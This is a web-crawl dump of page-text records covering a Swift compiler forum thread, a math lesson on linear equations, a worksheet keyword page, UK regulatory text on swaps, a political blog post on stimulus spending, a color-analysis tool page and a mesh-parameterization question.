{"ft_lang_label":"__label__en","ft_lang_prob":0.56576353,"math_prob":0.4776399,"size":1668,"snap":"2019-51-2020-05","text_gpt3_token_len":450,"char_repetition_ratio":0.1298077,"word_repetition_ratio":0.023715414,"special_character_ratio":0.30035973,"punctuation_ratio":0.21782178,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99602705,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-16T10:53:55Z\",\"WARC-Record-ID\":\"<urn:uuid:46936dea-38c7-4cfc-99d1-379ca630f495>\",\"Content-Length\":\"111501\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:924e6f1a-ada6-4768-a35c-aef749be1d05>\",\"WARC-Concurrent-To\":\"<urn:uuid:30887a90-73b4-4ee3-9c97-b94fcdf57c56>\",\"WARC-IP-Address\":\"104.26.14.93\",\"WARC-Target-URI\":\"https://www.w3resource.com/python-exercises/dictionary/python-data-type-dictionary-exercise-37.php\",\"WARC-Payload-Digest\":\"sha1:ZEXDAZJGYIP72DO7A7AG2NWZCWU7AHPK\",\"WARC-Block-Digest\":\"sha1:4S3QVGPZJO32YYXWXQJZT7X227LUE5JT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575541319511.97_warc_CC-MAIN-20191216093448-20191216121448-00190.warc.gz\"}"}
https://forums.swift.org/t/checking-if-dependentmembertype-conformance-requirement-is-satisfied-by-substitutionmap/25053
[ "# Checking if `DependentMemberType` conformance requirement is satisfied by SubstitutionMap\n\nHi compiler experts,\n\nI'm wondering how to check (in a SIL transform) whether a conformance requirement with a `DependentMemberType` lhs type is satisfied either in a given `SubstitutionMap` or in a given module.\n\nContext is the following program. 1 shows the array of `Requirement`s and 2 shows the substitution map. The \"given module\" is the current module.\n\n``````// In stdlib:\n// protocol Differentiable {\n// associatedtype TangentVector: Differentiable & AdditiveArithmetic\n// where ...\n// }\n\nprotocol MyProtocol {\nassociatedtype Scalar\n}\nextension MyProtocol where Scalar : FloatingPoint {\n// 1. `@differentiable` attribute declares an array of `Requirement`s in\n// a trailing where clause.\n//\n// Relevant to the question: the `Self.TangentVector : MyProtocol`\n// requirement is a conformance requirement, where the lhs\n// `Self.TangentVector` is a `DependentMemberType` type:\n//\n// (dependent_member_type assoc_type=Swift.(file).Differentiable.TangentVector\n// (base=generic_type_param_type depth=0 index=0 decl=main.(file).MyProtocol extension.Self))\n@differentiable(\nwhere Self : Differentiable, Scalar : Differentiable,\nSelf.TangentVector : MyProtocol\n)\nstatic func +(lhs: Self, rhs: Self) -> Self { ... }\n}\n\nstruct Dummy<Scalar> : MyProtocol {}\nextension Dummy : Differentiable where Scalar : Differentiable {\ntypealias TangentVector = Dummy\n}\n\nlet fn = { (x: Dummy<Float>) -> Dummy<Float> in\n// 2. Here, I need to check that the requirements declared in the\n// `@differentiable` attribute above are met.\n//\n// I have access to the substitution map of the `apply` instruction\n// corresponding to the `+` application:\n//\n// (substitution_map generic_signature=<τ_0_0 where τ_0_0 : MyProtocol, τ_0_0.Scalar : FloatingPoint>\n// (substitution τ_0_0 -> Dummy<Float>)\n// (conformance type=τ_0_0\n// (specialized_conformance type=Dummy<Float> protocol=MyProtocol\n// (substitution_map generic_signature=<τ_0_0>\n// (substitution τ_0_0 -> Float))\n// (conditional requirements unable to be computed)\n// (normal_conformance type=Dummy<Scalar> protocol=MyProtocol\n// (assoc_type req=Scalar type=Scalar))))\n// (conformance type=τ_0_0.Scalar\n// (normal_conformance type=Float protocol=FloatingPoint lazy)))\nreturn x + x\n}\n``````\n\nReposting the key information: how can I check whether the `Self.TangentVector : MyProtocol` conformance requirement, whose LHS is a `DependentMemberType`:\n\n``````(dependent_member_type assoc_type=Swift.(file).Differentiable.TangentVector\n(base=generic_type_param_type depth=0 index=0 decl=main.(file).MyProtocol extension.Self))\n``````\n\nIs satisfied given the current module and the following substitution map?\n\n``````(substitution_map generic_signature=<τ_0_0 where τ_0_0 : MyProtocol, τ_0_0.Scalar : FloatingPoint>\n(substitution τ_0_0 -> Dummy<Float>)\n(conformance type=τ_0_0\n(specialized_conformance type=Dummy<Float> protocol=MyProtocol\n(substitution_map generic_signature=<τ_0_0>\n(substitution τ_0_0 -> Float))\n(conditional requirements unable to be computed)\n(normal_conformance type=Dummy<Scalar> protocol=MyProtocol\n(assoc_type req=Scalar type=Scalar))))\n(conformance type=τ_0_0.Scalar\n(normal_conformance type=Float protocol=FloatingPoint lazy)))\n``````\n\nIntuitively, the requirement is satisfied: `Dummy<Float>` conforms to `Differentiable` and `Dummy<Float>.TangentVector` is equal to `Dummy<Float>` and also conforms to `Differentiable`.\n\nHowever, the conformance of `Dummy<Float>` to `Differentiable` is missing from the substitution map, and it's not clear how to remap `τ_0_0` from the substitution map to `Self` in the conformance requirement in a robust way.\n\nHere's the current hacky logic for checking this requirement: it calls `DependentMemberType:: substBaseType` on the first replacement type in the substitution map, if the substitution map has only one replacement type (acting as `Self`). It's not robust, and the entire `checkRequirementsSatisfied` function can likely be improved.\n\nAny advice would be greatly appreciated!\n\ncc team: @rxwei @bartchr808\ncc @Slava_Pestov\n\nWhy can't you just call SubstitutionMap::lookupConformance()?\n\nActually, I think what you want here is to do `module->lookupConformance(subMap.subst(myType), myProto)`. This should work with any Type, not just DependentMemberType.\n\nI don't believe the conformance of `τ_0_0` to `Differentiable` actually exists in the substitution map.\n\nThanks! Let me give this a try.\n\nEdit: actually, I believe `module->lookupConformance(subMap.subst(myType), myProto)` is already attempted, but it doesn't work for some reason:\n\n`````` if (auto origFirstType = firstType.subst(substMap)) {\nif (!origFirstType->hasError() &&\nswiftModule->lookupConformance(origFirstType, protocol)) {\ncontinue; // continue loop before diagnosing unmet requirement\n}\n}\n``````\n\nLet me see why it doesn't work.\n\nOh I see. That's weird and it suggests that the substitution map was built from the wrong generic signature. If the original generic signature had a requirement τ_0_0 : Differentiable, it would work.\n\nHowever, if that is not an option I think then you need something like:\n\n``````auto substType = type.subst(QuerySubstitutionMap(subMap), LookUpConformanceInModule(swiftModule))\n``````\n\nThen we will find the conformance in the module in order to resolve the correct type witness for τ_0_0.TangentVector (since it can't be found in the substitution map).\n\n1 Like\n\nFWIW, subst() will return the null type Type() on failure, not a type containing error types, so your code above will segfault in this case. If you want to return the original type with failed substitutions replaced by ErrorTypes, call `subst()` with SubstitutionFlags::UseErrorTypes.\n\n1 Like\n\nThis seems promising, thanks! Let me try it and report back." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.57185876,"math_prob":0.4092393,"size":3889,"snap":"2023-40-2023-50","text_gpt3_token_len":951,"char_repetition_ratio":0.17142858,"word_repetition_ratio":0.034042552,"special_character_ratio":0.23553613,"punctuation_ratio":0.14801444,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9594277,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-11-29T22:54:48Z\",\"WARC-Record-ID\":\"<urn:uuid:aa15c532-389b-4519-bc1a-fcdac423bd5c>\",\"Content-Length\":\"41784\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bebf6b7b-1881-47aa-9007-8bb8251ee6ab>\",\"WARC-Concurrent-To\":\"<urn:uuid:2ee714a8-27dc-49f3-8aa0-4dfd0cd893f0>\",\"WARC-IP-Address\":\"184.105.99.75\",\"WARC-Target-URI\":\"https://forums.swift.org/t/checking-if-dependentmembertype-conformance-requirement-is-satisfied-by-substitutionmap/25053\",\"WARC-Payload-Digest\":\"sha1:XCQZQRM3RKVSI37E5YQNXRRSTCG6WGLT\",\"WARC-Block-Digest\":\"sha1:GETVNIYLMQJY2FA26HQEJAG7Y4SWRGYX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100146.5_warc_CC-MAIN-20231129204528-20231129234528-00177.warc.gz\"}"}
https://unacademy.com/lesson/linear-equations-with-two-variables/HZWDWLEC
[ "to enroll in courses, follow best educators, interact with the community and track your progress.\nEnroll\n204\nLinear Equations with Two Variables\n799 plays\n\nMore\nIn this lesson we will discuss, What are linear equations with two variables, a couple of techniques to solve equations with two variables and some sample problems.\n\nU\nGP\nalso one suggesation if possible please add extra questions of your choise after explaining a perticular chapter may be some previous year question and explain it. it whould surely clear understanding basic of a perticular chapter.\nGP\nvery simple to understand. thank you so much. i appriciate your effort. please continue. please add more leson. if possible please cover all topics of bank and csat-2 paper qa in one series lesson if possible. explanation is outstanding.\nGP\n1. Linear Equations with 2 variables\n\n2. About Me Shubham Agrawal IIT Roorkee 2013 graduate Left job to pursue my passion- Education\n\n3. Linear Equations with 2 variables -> 0 Usually of the form ax + by + c Represents a line in x y plane . .\n\n4. Linear Equations with 2 variables -> . Usually of the form ax + by + c 0 Represents a line in x y plane .For every value of x, there's a corresponding value of y\n\n5. Linear Equations with 2 variables -> If there are 2 equations of the form . 1st Method 2. 2 abb 2 2.\n\n6. Linear Equations with 2 variables -> Q.\n\n7. Linear Equations with 2 variables -> Q. f- 2\n\n8. Linear Equations with 2 variables -> Q. f- TL YL\n\n9. Linear Equations with 2 variables -> If there are 2 equations of the form . a2x + by+20 a2 x 2nd Method Subtract or add one equation with the other to eliminate either x or y\n\n10. Linear Equations with 2 variables -> Q. 41+24-620 tD\n\n11. Linear Equations with 2 variables -> Represents intersection of the two lines in x y plane .\n\n12. Applications -> Q. The sum of the digits of a two digit number is 16. If the number formed by reversing the digits is less than the original number by 18. Find the original number.\n\n13. Applications -> Q. The ratio of the ages of the father and the son at present is 3: 1. Four years earliar, the ratio was 4: 1. What are the present ages of the son and the father?\n\n14. Applications -> Q. The ratio of the ages of the father and the son at present is 3: 1. Four years earliar, the ratio was 4: 1. What are the present ages of the son and the father?\n\n15. Applications -> Q. The ratio of the ages of the father and the son at present is 3: 1. Four years earliar, the ratio was 4: 1. What are the present ages of the son and the father? F- n e)\n\n16. Applications -> Q. The ratio of the ages of the father and the son at present is 3: 1. Four years earliar, the ratio was 4: 1. What are the present ages of the son and the father? YL F- n e)\n\n17. 6 12L2 12" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8893104,"math_prob":0.9954032,"size":2763,"snap":"2019-51-2020-05","text_gpt3_token_len":772,"char_repetition_ratio":0.16853933,"word_repetition_ratio":0.41541353,"special_character_ratio":0.26275787,"punctuation_ratio":0.10745234,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9974576,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-11T22:24:00Z\",\"WARC-Record-ID\":\"<urn:uuid:1a841899-eb75-4107-907c-3390b8f345be>\",\"Content-Length\":\"823976\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:50201bf4-8ae9-4591-857f-f55f9fa66ab2>\",\"WARC-Concurrent-To\":\"<urn:uuid:766471e9-1a6c-4e09-9fcd-d310c69d833b>\",\"WARC-IP-Address\":\"52.74.39.149\",\"WARC-Target-URI\":\"https://unacademy.com/lesson/linear-equations-with-two-variables/HZWDWLEC\",\"WARC-Payload-Digest\":\"sha1:7YY2JDQOAO2RVDI3QSHPHEHB4ZYUQZAL\",\"WARC-Block-Digest\":\"sha1:T3PTBNJDZYPMZVGKZ56QPRL4B23RALLA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540533401.22_warc_CC-MAIN-20191211212657-20191212000657-00082.warc.gz\"}"}
http://randomjohn.info/math-vocabulary-worksheets/collection-of-free-grade-math-vocabulary-worksheets-ready-to-download-or-print-please-do-multiplication-7-worksheet-library-and-fifth-words-num/
[ "# Collection Of Free Grade Math Vocabulary Worksheets Ready To Download Or Print Please Do Multiplication 7 Worksheet Library And Fifth Words Num", null, "collection of free grade math vocabulary worksheets ready to download or print please do multiplication 7 worksheet library and fifth words num.\n\nmath vocabulary worksheets lesson plans for grade related files 1st words to numbers word problems kindergarten,math key words worksheets algebra worksheet grade best solutions vocabulary definition esl,math vocabulary list with definitions kindergarten worksheets words maths for free collection of third grade 1,basic mathematics vocabulary poetry match worksheet free worksheets grade math second key words kindergarten,4th grade math vocabulary worksheets pdf maths positional words fourth,math positional words worksheets kindergarten vocabulary 6th grade 1st 5,maths vocabulary revision sorting worksheet activity sheet back to esl math worksheets basic for students,6th grade math vocabulary worksheets pdf flashcards for free printable first word problems preschoolers 2nd,math vocabulary worksheets pdf esl grade word searches social studies search kindergarten words,math word problems worksheets vocabulary pdf definition worksheet printable for students free activity sheets." ]
[ null, "http://randomjohn.info/wp-content/uploads/2019/05/collection-of-free-grade-math-vocabulary-worksheets-ready-to-download-or-print-please-do-multiplication-7-worksheet-library-and-fifth-words-num.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7342276,"math_prob":0.40612668,"size":1132,"snap":"2019-13-2019-22","text_gpt3_token_len":184,"char_repetition_ratio":0.25,"word_repetition_ratio":0.013888889,"special_character_ratio":0.1475265,"punctuation_ratio":0.065476194,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95492256,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-05-21T19:19:51Z\",\"WARC-Record-ID\":\"<urn:uuid:6c5ec287-06dc-4a20-8bfd-ea1de778fb30>\",\"Content-Length\":\"55539\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:42a0813b-e89a-4521-b9f2-ba35ff03ea60>\",\"WARC-Concurrent-To\":\"<urn:uuid:564c89b0-4d36-4834-9c79-a095308d33db>\",\"WARC-IP-Address\":\"104.27.139.32\",\"WARC-Target-URI\":\"http://randomjohn.info/math-vocabulary-worksheets/collection-of-free-grade-math-vocabulary-worksheets-ready-to-download-or-print-please-do-multiplication-7-worksheet-library-and-fifth-words-num/\",\"WARC-Payload-Digest\":\"sha1:YGZ7WHC7L7LBYFG2OB6NRI3SNYPGHRIK\",\"WARC-Block-Digest\":\"sha1:PFSJUH3VAXC7S4GTXFJXVU7FT4QVCYDF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-22/CC-MAIN-2019-22_segments_1558232256546.11_warc_CC-MAIN-20190521182616-20190521204616-00551.warc.gz\"}"}
https://handbook.fca.org.uk/handbook?related-provisions-for-provision=BIPRU%207.2.24&date=2016-10-03
[ "# Related provisions for BIPRU 7.2.24\n\n1 - 2 of 2 items.\n\n#### Similar To\n\nTo access the FCA Handbook Archive choose a date between 1 January 2001 and 31 December 2004 (From field only).\n\nBIPRU 7.2.21RRP\nInterest rate swaps or foreign currency swaps without deferred starts must be treated as the two notional positions (one long, one short) shown in the table in BIPRU 7.2.22R.\nBIPRU 7.2.22RRP\n\nTable: Interest rate and foreign currency swaps\n\nThis table belongs to BIPRU 7.2.21R\n\n Paying leg (which must be treated as a short position in a zero-specific-risk security) Receiving leg (which must be treated as a long position in a zero-specific-risk security) Receiving fixed and paying floating Coupon equals the floating rate and maturity equals the reset date Coupon equals the fixed rate of the swap and maturity equals the maturity of the swap Paying fixed and receiving floating Coupon equals the fixed rate of the swap and maturity equals the maturity of the swap Coupon equals the floating rate and maturity equals the reset date Paying floating and receiving floating Coupon equals the floating rate and maturity equals the reset date Coupon equals the floating rate and maturity equals the reset date\nBIPRU 7.2.25RRP\n\nTable: Deferred start interest rate and foreign currency swaps\n\nThis table belongs to BIPRU 7.2.24R\n\n Paying leg (which must be treated as a short position in a zero-specific-risk security with a coupon equal to the fixed rate of the swap) Receiving leg (which must be treated as a long position in a zero-specific-risk security with a coupon equal to the fixed rate of the swap) Receiving fixed and paying floating maturity equals the start date of the swap maturity equals the maturity of the swap Paying fixed and receiving floating maturity equals the maturity of the swap maturity equals the start date of the swap\nBIPRU 7.2.46AGRP\n3BIPRU 7.2.43 R includes both actual and notional positions. However, notional positions in a zero-specific-risk security do not attract specific risk. For example:(1) interest-rate swaps, foreign-currency swaps, FRAs, interest-rate futures, foreign-currencyforwards, foreign-currencyfutures, and the cash leg of repurchase agreements and reverse repurchase agreements create notional positions which will not attract specific risk; while(2) futures, forwards and swaps which are based\nIFPRU 6.2.10GRP\nInterest-rate swaps or foreign currency swaps with a deferred start should be treated as the two notional positions (one long, one short). The paying leg should be treated as a short position in a zero specific risk security with a coupon equal to the fixed rate of the swap. The receiving leg should be treated as a long position in a zero specific risk security, which also has a coupon equal to the fixed rate of the swap." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8459303,"math_prob":0.9806719,"size":1503,"snap":"2020-24-2020-29","text_gpt3_token_len":335,"char_repetition_ratio":0.19146097,"word_repetition_ratio":0.81322956,"special_character_ratio":0.20958084,"punctuation_ratio":0.030303031,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9597255,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-06-01T09:12:54Z\",\"WARC-Record-ID\":\"<urn:uuid:92f8c2e2-2547-4893-a13f-a69656ee3ecd>\",\"Content-Length\":\"38861\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0f7ef97f-ae10-4fef-ae75-6e465a48fc7b>\",\"WARC-Concurrent-To\":\"<urn:uuid:240a6f6e-cdce-4656-95ce-9e0469c4c9f0>\",\"WARC-IP-Address\":\"35.178.221.231\",\"WARC-Target-URI\":\"https://handbook.fca.org.uk/handbook?related-provisions-for-provision=BIPRU%207.2.24&date=2016-10-03\",\"WARC-Payload-Digest\":\"sha1:IT3IRDCJT6MLKH63PBBK3KLC2ENCAAQ2\",\"WARC-Block-Digest\":\"sha1:O7RR5QGAWGOE3IC2L2AXWSXE67HVNVSX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347415315.43_warc_CC-MAIN-20200601071242-20200601101242-00565.warc.gz\"}"}
https://ronaldgrey.com/2011/12/09/fisca-stimulus-to-guarantee-results/
[ "# Fiscal Stimulus to Guarantee Results", null, "Figure 1. Pareto plot shows Obama’s 2009 stimulus spending was wasteful.\n\nMuch of the wasteful spending by Barack Obama – such as his failed stimulus of 2009 – could be prevented through the use of a simple statistical tool\n\n### The Economy’s Performance Gap\n\nBarack Obama’s handling of the economy — America’s most important problem — has been disappointing.\n\n### Obama Defined by Maldistribution Curve\n\nTo determine the degree to which the maldistribution of Obama’s stimulus spending is associated with the Pareto distribution with probability density function (PDF)", null, "$P(x) = \\displaystyle\\frac{ab^a}{x^{a+1}}$  for", null, "$x \\geq b$\n\nnormalized values for the Pareto PDF were plotted as a function of normalized values for spending. Linear regression by method of least squares fitting revealed a near-perfect correlation between the values, with the fitted line’s slope (R) equal to 0.9962 (Figure 2).", null, "" ]
[ null, "https://ronaldgrey.files.wordpress.com/2011/12/pareto.png", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://ronaldgrey.files.wordpress.com/2011/12/correlation4.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.95009804,"math_prob":0.96052116,"size":3475,"snap":"2023-14-2023-23","text_gpt3_token_len":700,"char_repetition_ratio":0.12762892,"word_repetition_ratio":0.02247191,"special_character_ratio":0.20115107,"punctuation_ratio":0.08169935,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9609814,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,5,null,null,null,null,null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-25T11:40:23Z\",\"WARC-Record-ID\":\"<urn:uuid:5a8114fa-ff7c-4755-a730-42a10d32c845>\",\"Content-Length\":\"92776\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1df66081-97df-492c-8e8b-9b034990cafc>\",\"WARC-Concurrent-To\":\"<urn:uuid:e681fa56-650a-46c0-b545-6d026c4fe26e>\",\"WARC-IP-Address\":\"192.0.78.25\",\"WARC-Target-URI\":\"https://ronaldgrey.com/2011/12/09/fisca-stimulus-to-guarantee-results/\",\"WARC-Payload-Digest\":\"sha1:APFXVARJZKH2M3QUUEYDUF6H7LWZRRVK\",\"WARC-Block-Digest\":\"sha1:ULU6X6ZHIOSDZE5GATCVE2CK7HTLWKTW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296945323.37_warc_CC-MAIN-20230325095252-20230325125252-00064.warc.gz\"}"}
https://plus.maths.org/content/comment/reply/2308/8116
[ "### Engineer\n\nThink of a cube. This has 6 faces, 12 edges and 8 vertices, so E-V=4\nNow take one of the edges, and add a midpoint vertex. This divides the edge into two, so you also end up adding an edge ( and two of the faces now have 5 edges instead of 4, but that is irrelevant) So now you have E=13,V=9 and still E-V=4\n\nIt is clear that this can be repeated as many times as you want. So yes, there are really an unlimited number of possibilities!" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.95641077,"math_prob":0.84917116,"size":880,"snap":"2020-45-2020-50","text_gpt3_token_len":239,"char_repetition_ratio":0.10958904,"word_repetition_ratio":0.9714286,"special_character_ratio":0.27045456,"punctuation_ratio":0.103286386,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9863828,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-26T10:26:52Z\",\"WARC-Record-ID\":\"<urn:uuid:59d979e9-4604-4388-8c77-1c207cfddcb5>\",\"Content-Length\":\"24622\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7ebbbcd8-4424-4374-9efd-4a723af051b4>\",\"WARC-Concurrent-To\":\"<urn:uuid:ea470bca-0ffd-401a-b4bf-1117ab683571>\",\"WARC-IP-Address\":\"131.111.24.106\",\"WARC-Target-URI\":\"https://plus.maths.org/content/comment/reply/2308/8116\",\"WARC-Payload-Digest\":\"sha1:XVVSSJXBVCKYQSBQFA2JBC25UXCRPUEW\",\"WARC-Block-Digest\":\"sha1:UAN7QOKFCEHLUM7LCXEMNWXZ23SJZE5O\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141187753.32_warc_CC-MAIN-20201126084625-20201126114625-00247.warc.gz\"}"}
https://www.iktsoft.net/keiji-en/articles/4694/
[ "« Top\n\n## 3D Color Analysis\n\nWednesday, July 04, 2001\nA visualization of the RGB color space provides interesting insight about the color distribution of the picture.\nObjective\nThe purposes of this program is to grasp the pattern of the colors used in the image or to see the color variation which define the image.\nIn order to do so, this program convert each pixel into 3D space according to its RGB value.", null, "To achieve it, this program has such functions as follows:\n\n• Load *.jpg, *.png, *.bmp file.\n• Show total image in left screen.\n• Plot each pixel in right screen.\nThose pixels are plotted in 3D space using various projections.\n\nScreen snapshot of Color Spatioplotter", null, "iOS version is now available.\n\nThe Method of projection of color in 3D space\nThere are various method to plot color value into 3D space.\nThe projection methods are as follows:\n\nRGB(x=R, y=G, z=B)", null, "RGB (rotated)", null, "", null, "a. Line (0,0,0)-(1,1,1) of Fig.1 is converted as Z-axis.\nb. Emphasized to XY plane.\n\nHSV,polar coordinate (x=S*cos(H), y=S*sin(H), z=V)", null, "HSV(x=H, y=S, z=V)", null, "CMY(K)(x=C, y=M, z=Y)\nThe value 'K' is not shown in the space.", null, "CMYK (rotated)", null, "", null, "a. Line (0,0,0)-(1,1,1) of Fig.5 is converted as Z-axis.\nb. Emphasized to XY space.\nc. Multiplying z value by 'K' value." ]
[ null, "https://www.iktsoft.net/ws/f/162/454.png", null, "https://www.iktsoft.net/ws/f/162/455.jpg", null, "https://www.iktsoft.net/ws/f/162/456.jpg", null, "https://www.iktsoft.net/ws/f/162/457.jpg", null, "https://www.iktsoft.net/ws/f/162/458.jpg", null, "https://www.iktsoft.net/ws/f/162/459.jpg", null, "https://www.iktsoft.net/ws/f/162/460.jpg", null, "https://www.iktsoft.net/ws/f/162/461.jpg", null, "https://www.iktsoft.net/ws/f/162/462.jpg", null, "https://www.iktsoft.net/ws/f/162/463.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83926743,"math_prob":0.975527,"size":1197,"snap":"2021-31-2021-39","text_gpt3_token_len":335,"char_repetition_ratio":0.10813076,"word_repetition_ratio":0.050251257,"special_character_ratio":0.26900584,"punctuation_ratio":0.1696113,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9925128,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-28T16:40:50Z\",\"WARC-Record-ID\":\"<urn:uuid:320ec747-dc51-43ed-bfd5-6de1841a89bc>\",\"Content-Length\":\"20854\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:81ee3031-1e7c-4859-9754-0317322f2370>\",\"WARC-Concurrent-To\":\"<urn:uuid:a5969f13-f430-4555-aac1-b2d1195a1be2>\",\"WARC-IP-Address\":\"96.31.34.118\",\"WARC-Target-URI\":\"https://www.iktsoft.net/keiji-en/articles/4694/\",\"WARC-Payload-Digest\":\"sha1:NBDU74BY47X4YI7C6YI5TXCO52LRJDIB\",\"WARC-Block-Digest\":\"sha1:F7VYGZ4FYK3HPBHT5IKGZSJB62SKDCXX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046153739.28_warc_CC-MAIN-20210728154442-20210728184442-00108.warc.gz\"}"}
https://computergraphics.stackexchange.com/questions/4703/algorithm-to-map-a-triangular-mesh-onto-plane-preserving-angles-and-distances-fr
[ "# Algorithm to map a triangular mesh onto plane preserving angles and distances from one vertex\n\nI have a 3D triangular mesh representing cortical surface of a brain. I also have one vertex of interest. I would like to unfold a neighborhood of this vertex in such a way that both the angles (their ratios) and distances of paths from this vertex are preserved as much as possible.\n\nI read some reviews on mesh parameterization techniques (eg. this one by Scheffer et al.). My understanding is that all the algorithms try to preserve a certain property (angle, distance, area) or a combination of those properties for all of the vertices or faces. In my case I need to preserve angles and distance of paths going from only one point. My intuition tells me that what I need should be quite simple because I demand much less from the output than all those parameterization algorithms. Yet I cannot come up with the solution. Any help is greatly appreciated.\n\n• Are you looking to preserve the ratio between angles, to keep things in proportion, or to preserve the exact angle values? In general the angles cannot be preserved as angles around a point do not necessarily add up to 360 degrees in a non-planar surface. Feb 13 '17 at 16:42\n• The ratio. I will edit the post. Thank you for pointing this out. Feb 13 '17 at 17:13\n• @trichoplax Angles around a point do add up to 360° as long as the surface is smooth (a small patch around the point looks like a plane). You might be thinking of the angles inside a polygon? For instance, the interior angles of a triangle don't add up to 180° on a curved surface in general. Feb 13 '17 at 22:20\n• Please see Nathan's comment which explains my misunderstanding (thanks Nathan - that is indeed what I was confusing it with) Feb 14 '17 at 14:45\n• @NathanReed I'm doubting myself now, but I think my error was in terminology (talking about surface instead of mesh), and that the intended point stands. Although the smooth surface that is being approximated by a triangle mesh is locally planar, the mesh itself, as a polyhedron, does not have angles around each vertex that sum to 360°. So an angle preserving projection can be made from a surface to a plane, but the angles are dependent on which surface was chosen to fit to the vertices of the mesh prior to projection (unless the original surface is known). Is this relevant here? Feb 14 '17 at 16:09" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.95283973,"math_prob":0.70015484,"size":856,"snap":"2021-43-2021-49","text_gpt3_token_len":173,"char_repetition_ratio":0.09741784,"word_repetition_ratio":0.0,"special_character_ratio":0.19859813,"punctuation_ratio":0.07926829,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98075795,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-27T04:12:37Z\",\"WARC-Record-ID\":\"<urn:uuid:c98a876d-da4a-4e89-90e0-8c0361cc2fef>\",\"Content-Length\":\"170076\",\"Content-Type\":\"application/http; 